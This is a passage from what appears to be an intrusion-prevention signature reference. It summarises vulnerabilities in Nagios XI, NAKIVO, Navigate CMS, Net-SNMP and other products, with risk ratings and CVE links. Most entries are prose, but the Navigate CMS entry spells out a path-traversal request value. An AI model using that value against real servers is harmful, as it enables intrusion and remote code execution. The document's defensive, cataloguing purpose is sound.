https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15709
Back to top

Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection

About this vulnerability: A vulnerability in Nagios XI.
Risk: High
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A vulnerability in Nagios XI, versions before 5.8.6, which allows remote attackers to execute arbitrary code by uploading crafted files to the target server, dudue to lack of input sanitization on the names of user-uploaded archive files.
Situation: HTTP_CS-Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection
References:
CVE-2021-40345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40345
Back to top

Nagios-XI-Command_test.php-Command-Injection

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There exists a command injection vulnerability in Nagios XI. Successful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-Nagios-XI-Command_test.php-Command-Injection
Back to top

Nagios-XI-Configwizards-Multiple-Command-Injections

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Improper input validation in switch.inc.php and cloud-vm.inc.php cause command injection vulnerabilities CVE-2021-37344, CVE-2021-25297, and CVE-2021-25298 in Nagios XI. A successful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the vulnerable service.
Situation: HTTP_CRL-Nagios-XI-Configwizards-Multiple-Command-Injections
References:
CVE-2021-25297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25297
Back to top

Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to the Windowswmi.inc.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.
Situation: HTTP_CRL-Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection
References:
CVE-2021-25296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25296
Back to top

Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Nagios XI.
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Linux
Software: Nagios XI
Type: Insecure Configuration
Description: A vulnerability in Nagios XI, versions before 5.8.6, which allows remote attackers to upload arbitrary files and execute code by sending crafted HTTP requests to a target server, due to insecure settings in the distributed configuration file in a component directory.
Situation: HTTP_CS-Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload
References:
CVE-2021-40344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40344
Back to top

Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Platform: Generic
Software: Nagios XI
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Nagios XI. Successful exploitation could lead in arbitrary file write and possible code execution on the target server.
Situation: HTTP_CRL-Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal
References:
CVE-2021-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3277
Back to top

Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Platform: Generic
Software: Nagios XI
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Nagios XI. The vulnerability is due to improper validation of user data used in a file path in the "command_test.php" script. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the user running the vulnerable server.
Situation: HTTP_CRL-Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal
References:
CVE-2023-48085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48085
Back to top

Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of user inputs when processing requests for Deploy Dashboards feature. A remote authenticated attacker can exploit this vulnerability by sending crafted request to the server. Successful exploitation could result in arbitrary script code execution on the client's browser.
Situation: HTTP_CRL-Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting
References:
CVE-2020-27989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27989
Back to top

Nagios-XI-favorites.inc.php-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in Nagios XI detected
Risk: High
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Platform: Linux; Unix
Software: Nagios XI
Type: Input Validation
Description: A vulnerability in Nagios XI, versions 2024R1 and earlier, which allows remote attackers to execute arbitrary SQL statements against the target server's database due to improper validation of user data in the favorites.inc.php component.
Situation: HTTP_CSU-Nagios-XI-favorites.inc.php-SQL-Injection
References:
CVE-2024-24401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401
Back to top

Nagios-XI-Helpedit.php-SQL-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in Nagios XI. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation might allow the attacker to read and modify content of the database.
Situation: HTTP_CRL-Nagios-XI-Helpedit.php-SQL-Injection
References:
CVE-2018-8734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8734
Back to top

Nagios-XI-historytab_content.php-SQL-Injection

About this vulnerability: A vulnerability in Nagios XI
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Linux; Unix
Software: Nagios XI
Type: SQL Injection
Description: A vulnerability in Nagios XI, versions prior to 2024R1.3.1, which allows remote attackers to execute arbitrary SQL commands on target servers due to improper validation of the user data used in the historytab_content.php script.
Situation: HTTP_CRL-Nagios-XI-historytab_content.php-SQL-Injection
Back to top

Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There exists an SQL injection vulnerability in Nagios Incident Manager (IM) integration component of Nagios XI. A remote, unauthenticated attacker can use this to disclose sensitive information from the database.
Situation: HTTP_CRL-Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection
Back to top

Nagios-XI-Magpie-Curl-Argument-Injection

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There has been reported an argument injection vulnerability in the Magpie RSS module of Nagios XI. Due to insufficient validation of HTTPS URLs submitted to the service, an unautheticated remote attacker can exploit this vulnerability to get arbitrary code execution on the target server.
Situation: HTTP_CSU-Nagios-XI-Magpie-Curl-Argument-Injection
References:
CVE-2018-15708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15708
Back to top

Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI. Successful exploitation could result in arbitrary script code execution in the target user's browser.
Situation: HTTP_CRL-Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting
References:
CVE-2021-38156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38156
Back to top

Nagios-XI-Mibs.php-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A command injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the mibs.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation could result in arbitrary command execution with the web server privilege on the target server.
Situation: HTTP_CRL-Nagios-XI-Mibs.php-Command-Injection
References:
CVE-2020-5791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5791
Back to top

Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1345-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Improper input validation in the Manage Plugins endpoint causes a command injection vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CS-Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection
References:
CVE-2020-35578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35578
Back to top

Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the host, hostgroup, and servicegroup parameters sent to the nocscreenapi.php script. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting
References:
CVE-2019-20139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20139
Back to top

Nagios-XI-Privilege-Escalation

About this vulnerability: A vulnerability in Nagios XI
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Insecure Configuration
Description: A vulnerability in Nagios XI, versions 5.2.6-5.4.12, that allows remote attackers to escalate the DB user to root.
Situation: HTTP_CRL-Nagios-XI-Privilege-Escalation
References:
CVE-2018-8736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8736
Back to top

Nagios-XI-Remote-Code-Execution

About this vulnerability: A vulnerability in Nagios XI
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A vulnerability in Nagios XI, versions 5.2.6-5.4.12, that allows remote attackers to execute arbitrary commands through /nagiosxi/backend/index.php with nopasswd sudo.
Situation: HTTP_CRL-Nagios-XI-Remote-Code-Execution
References:
CVE-2018-8735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8735
Back to top

Nagios-XI-SNMP-Trap-SQL-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: High
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Nagios XI. This vulnerability is due to insufficient validation of the input parameters in the SNMP Trap edit functionality. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to a target service. Successful exploitation could result in the execution of arbitrary SQL statement, potentially leading to the disclosure of sensitive information.
Situation: HTTP_CRL-Nagios-XI-SNMP-Trap-SQL-Injection
Back to top

Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection

About this vulnerability: A vulnerability in Nagios XI.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Linux; Unix
Software: Nagios XI
Type: Input Validation
Description: A vulnerability in Nagios XI, versions 5.5.0 to 5.7.3, which allows remote attackers to execute arbitrary php code by allowing the upload of a simple PHP shell to includes/components/nxti/index.php, due to insufficient input validation.
Situation: HTTP_CS-Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection
References:
CVE-2020-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5792
Back to top

Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712

About this vulnerability: An attempt to exploit a vulnerability in Nagios XI detected
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Nagios XI
Type: Cross-site Scripting
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI 5.5.6. Successful exploitation could result in arbitrary script code execution in the target user's browser.
Situation: HTTP_CSU-Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712
References:
CVE-2018-15712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15712
Back to top

Nagios-XI-Two-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There has been reported cross-site scripting vulnerabilities in Nagios XI. Successful exploitation could lead in arbitrary script code execution.
Situation: HTTP_CRL-Nagios-XI-Two-Reflected-Cross-Site-Scripting
References:
CVE-2020-10819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10819
Back to top

Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1281-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of the phone parameter in users.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting
Back to top

Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of username in users.php. A remote authenticated attacker can exploit this vulnerability by sending crafted request to the server. Successful exploitation could result in arbitrary script code execution on the client's browser.
Situation: HTTP_CRL-Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting
References:
CVE-2020-27988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27988
Back to top

Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection

About this vulnerability: A vulnerability in Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: There exists a command injection vulnerability in Nagios XI. Successful exploitation could lead in arbitrary command execution.
Situation: HTTP_CRL-Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection
Back to top

Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios XI
Risk: High
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Nagios XI
Type: Input Validation
Description: There exists a vulnerability in Nagios XI, versions proir to 5.7.2, which allows remote attackers to execute arbitrary code via the link parameter in visFunctions.inc.php, due to improper user input validation.
Situation: HTTP_CRL-Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting
References:
CVE-2020-15902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15902
Back to top

Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Improper input validation of requests submitted to the functionality implemented in watchguard.inc.php causes a command injection vulnerability in Nagios XI. A successful exploit allows a remote attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection
References:
CVE-2021-37346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37346
Back to top

Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises Nagios XI
Risk: Moderate
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: Nagios XI
Type: Input Validation
Description: Improper validation of the url parameter in sshterm.php causes a cross-site scripting vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary code on a user's browser.
Situation: HTTP_CSU-Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting
References:
CVE-2021-25299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25299
Back to top

NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nagios Enterprises NagiosQL
Risk: Moderate
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NagiosQL
Type: Input Validation
Description: A cross site scripting vulnerability exists in NagiosQL. The vulnerability is due to lack of input validation on the txtSearch parameter passed to the hostdependencies.php resource. A remote attacker could exploit this vulnerability by enticing a user to follow a crafted link or view a webpage. Successful exploitation could result in attacker controlled script code being executed in the browser of the enticed user.
Situation: HTTP_CRL-NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting
References:
CVE-2013-6039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6039
OSVDB-100612
http://www.osvdb.org/100612
Back to top

Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248

About this vulnerability: A vulnerability in NAKIVO Backup and Replication
Risk: High
First detected in: sgpkg-ips-1854-5242
Last changed: sgpkg-ips-1854-5242
Platform: Generic
Software: NAKIVO Backup and Replication
Type: Directory Traversal
Description: An arbitrary file read vulnerability has been reported in NAKIVO Backup and Replication versions before 11.0.0.88174. This vulnerability is due to an absolute path traversal in getImageByPath and may allow remote code execution.
Situation: File-Text_Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248
References:
CVE-2024-48248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48248
Back to top

NanoCore-RAT-C2-Traffic

About this vulnerability: NanoCore RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NanoCore is a remote access trojan (RAT) that can be modified to include additional plugins.
Situation: Generic_CS_NanoCore-RAT-C2-Traffic
Back to top

Nanopool-Claymore-Dual-Miner-RCE

About this vulnerability: A vulnerability in Nanopool Claymore Dual Miner
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Claymore Dual GPU Miner
Type: Input Validation
Description: A vulnerability in Nanopool Claymore Dual Miner, versions 7.3 and before, which allows remote attackers to execute arbitrary code through parameters in the miner API.
Situation: Generic_CS-Nanopool-Claymore-Dual-Miner-RCE
References:
CVE-2018-1000049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000049
Back to top

Nas4Free-Remote-Command-Execution

About this vulnerability: Nas4Free Remote Command Execution
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nas4Free
Type: PHP Injection
Description: There is a remote command execution vulnerability in Nas4Free software NAS solution. An authenticated user can exploit this by executing arbitrary PHP code within the target system.
Situation: HTTP_CRL-Nas4Free-Remote-Command-Execution
References:
CVE-2013-3631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3631
OSVDB-99142
http://www.osvdb.org/99142
Back to top

National-Instruments-Installer-Framework-ActiveX-Arbitrary-File-Creation

About this vulnerability: A vulnerability in National Instruments Installer Framework
Risk: Moderate
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: National Instruments Installer Framework; ABB DataManager
Type: Directory Traversal
Description: There is an arbitrary file writing vulnerability in the National Instruments Installer Framework. The vulnerability is due to the exposure of an insecure method ExportStyle() by multiple ActiveX controls shipped as a part of the product. An attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page or to view a malicious document. Successful exploitation would allow an attacker to create arbitrary files with attacker-controlled contents, which could eventually lead to arbitrary command execution on the target machine. Note that this vulnerability may be exposed by third-party products, which incorporate National Instruments products.
Situation: File-Text_National-Instruments-Installer-ActiveX-Arbitrary-File-Creation
References:
OSVDB-94425
http://www.osvdb.org/94425
Back to top

NaviCOPA-Web-Server-Buffer-Overflow

About this vulnerability: NaviCOPA Web Server 2.01 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NaviCOPA
Type: Buffer Overflow
Description: A buffer overflow vulnerability in NaviCOPA Web Server 2.01 which allows remote attackers to execute arbitrary code, or cause a denial of service condition,via a long HTTP GET request.
Situation: HTTP_CSU-NaviCOPA-Web-Server-Buffer-Overflow
References:
CVE-2006-5112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5112
BID-20250
http://www.securityfocus.com/bid/20250
OSVDB-29257
http://www.osvdb.org/29257
Back to top

Navigate-CMS-Unauthenticated-Remote-Code-Execution

About this vulnerability: A vulnerability in Navigate CMS
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Navigate CMS
Type: Code Injection
Description: A vulnerability in Navigate CMS, versions 2.8 and before, in navigate_upload.php which allows remote attackers to execute arbitrary code via a POST request with engine=picnik and id=../../../navigate_info.php.
Situation: HTTP_CSU-Navigate-CMS-Unauthenticated-Remote-Code-Execution
References:
CVE-2018-17553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17553
Back to top

NBD-Network-Block-Device-Server-Long-Request-Buffer-Overflow

About this vulnerability: A long request to the NBD server causes a buffer overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: NBD Server
Type: Buffer Overflow
Description: The NBD server suffers from a vulnerability where a large client request results in a buffer overflow. The server reserves a one megabyte buffer for client requests, but does not sufficiently check input sizes. A client request where the request data is smaller than the buffer, but the size of the whole request including request headers is larger than the buffer results in a buffer overflow. The vulnerability allows remote attackers to execute arbitrary code on the server with a successful attack.
Situation: Generic_Network-Block-Device-Server-Long-Request-Buffer-Overflow
References:
CVE-2005-3534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534
BID-16029
http://www.securityfocus.com/bid/16029
OSVDB-21848
http://www.osvdb.org/21848
Back to top

NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal

About this vulnerability: A vulnerability in NEC ESMPRO Manager
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NEC ESMPRO Manager
Type: Directory Traversal
Description: Improper validation of the user-supplied path in GetEuaLogDownloadAction class causes a directory traversal vulnerability in NEC ESMPRO Manager. A successful attack may allow an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal
Back to top

NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection

About this vulnerability: A vulnerability in NEC EXPRESSCLUSTER X
Risk: Moderate
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NEC EXPRESSCLUSTER X
Type: Input Validation
Description: There has been reported an XML external entity injection vulnerability in NEC ExpressCluster. Successful exploitation could result in a disclosure of sensitive information.
Situation: HTTP_CRL-NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection
References:
CVE-2020-17408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17408
Back to top

Necta-LLC-WiFi-Mouse-RCE

About this vulnerability: A vulnerability in the Necta LLC Wifi Mouse server.
Risk: High
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: Necta LLC
Type: Input Validation
Description: A vulnerability in the Necta LLC Wifi Mouse server, verions 1.8.3.4 and 1.8.2.3, that allow remote attackers to bypass authentication and open programs on the server and type commands that will be executed as the user running WiFi Mouse (Mouse Server).
Situation: HTTP_CS-Necta-LLC-WiFi-Mouse-RCE
References:
CVE-2022-3218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3218
Back to top

Need2Find-Toolbar

About this vulnerability: Need2Find Internet Explorer Toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Need2Find Toolbar
Type: Misconfiguration
Description: Need2Find Toolbar is a toolbar for Internet Explorer. It displays advertisements and may be considered unwanted software by some organizations.
Situation: HTTP_CSH-Need2Find-Toolbar-Activity
Back to top

Neo4J-Shell-Server-setSessionVariable-Deserialization-CVE-2021-34371

About this vulnerability: An attempt to exploit a vulnerability in Neo4j detected
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Neo4j
Type: Input Validation
Description: Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through "setSessionVariable". An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.
Situation: Generic_CS-Suspicious-Java-Serialized-Object
References:
CVE-2021-34371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34371
Back to top

Nerbian-RAT-C2-Traffic

About this vulnerability: Nerbian RAT command and control traffic
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An HTTP request that matches a known Nerbian RAT command and control traffic pattern was detected.
Situation: HTTP_CRL-Nerbian-RAT-C2-Traffic
Back to top

Nessus-Vulnerability-Scanner-Usage

About this vulnerability: Nessus vulnerability scanner usage detection
Risk: Low
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nessus
Type: Vulnerability Scanner
Description: Nessus is a vulnerability scanner that can be used to scan hosts for remotely exploitable vulnerabilities. Nessus is a useful tool for network administrators, but can also be used by attackers looking for vulnerable hosts to exploit.
Situation: Generic_UDP-Nessus-Vulnerability-Scanner-Usage
HTTP_CSU-Nessus-Vulnerability-Scanner-Usage
FTP_CS-Nessus-Vulnerability-Scanner-Usage
NetBIOS-TCP_Nessus-Vulnerability-Scanner-Usage
MSRPC-TCP_CS-Nessus-Vulnerability-Scanner-Usage
SMB-TCP_CHS-Nessus-Vulnerability-Scanner-Usage
Generic_CS-Nessus-Vulnerability-Scanner-Usage
TFTP_Nessus-Vulnerability-Scanner-Usage
Back to top

Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Net-SNMP
Risk: Moderate
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1537-5242
Platform: Generic
Software: Net-SNMP
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in handle_ipDefaultTTL function in Net-SNMP. This vulnerability is due to improper validation of parameters of the SET SNMP operation. A remote attacker could exploit this vulnerability by sending a crafted SNMP packet requesting a SET operation on the default TTL scalar to the targeted device. Successful exploitation could result in denial of service conditions on the target server.
Situation: SNMP-UDP_Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference
References:
CVE-2022-44792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44792
Back to top

Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Net-SNMP
Risk: Moderate
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1550-5242
Platform: Generic
Software: Net-SNMP
Type: Malfunction
Description: A NULL pointer dereference vulnerability has been reported in handle_ipv6IpForwarding function in Net-SNMP. This vulnerability is due to improper validation of parameters of the SET SNMP operation. A remote attacker could exploit this vulnerability by sending a crafted SNMP packet requesting a SET operation on the ipv6IpForwarding flag to the targeted device. Successful exploitation could result in denial of service conditions on the target server.
Situation: SNMP-UDP_Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference
References:
CVE-2022-44793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44793
Back to top

Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution

About this vulnerability: A vulnerability in Net-SNMP
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Net-SNMP
